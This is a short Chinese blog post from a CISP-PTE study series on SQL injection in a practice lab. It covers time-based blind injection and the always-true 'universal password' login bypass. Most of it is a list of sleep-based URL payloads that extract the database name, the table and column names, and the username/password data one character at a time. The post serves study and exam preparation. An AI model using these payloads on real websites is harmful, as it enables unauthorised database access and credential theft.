网安入门06-Sql注入（时间盲注&万能密码）

最新推荐文章于 2024-07-08 14:08:11 发布

挑不动

最新推荐文章于 2024-07-08 14:08:11 发布

阅读量441

点赞数 8

分类专栏： CISP-PTE备考之路文章标签： sql 数据库 oracle

本文链接：https://blog.csdn.net/m0_61499194/article/details/135195244

版权

CISP-PTE备考之路专栏收录该内容

26 篇文章 5 订阅

订阅专栏

以第9关为例：无论输入任何参数，页面显示一样，没有两种状态可以判断，无法使用布尔盲注

时间盲注

?id=1' and if(1=1,sleep(5),1)--+
判断参数构造。
?id=1'and if(length((select database()))>9,sleep(5),1)--+
判断数据库名长度 
?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
逐一判断数据库字符
?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
判断所有表名长度
?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
逐一判断表名
?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
判断所有字段名的长度 
?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
逐一判断字段名。
?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
判断字段内容长度 
?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
逐一检测内容。

万能密码

Less11
使用恒成立的sql语句来进入后台

还可以继续手工注入
Less12

先判断是否存在注入点
再找出显示位(回显点)
Less15，16
不提供报错信息，需要布尔盲注，不深究了

挑不动

关注

8
点赞
踩
7

收藏

觉得还不错? 一键收藏
打赏
0
评论
网安入门06-Sql注入（时间盲注&万能密码）

以第9关为例：无论输入任何参数，页面显示一样，没有两种状态可以判断，无法使用布尔盲注万能密码Less11使用恒成立的sql语句来进入后台还可以继续手工注入 Less12先判断是否存在注入点再找出显示位(回显点)Less15，16不提供报错信息，需要布尔盲注，不深究了
复制链接

扫一扫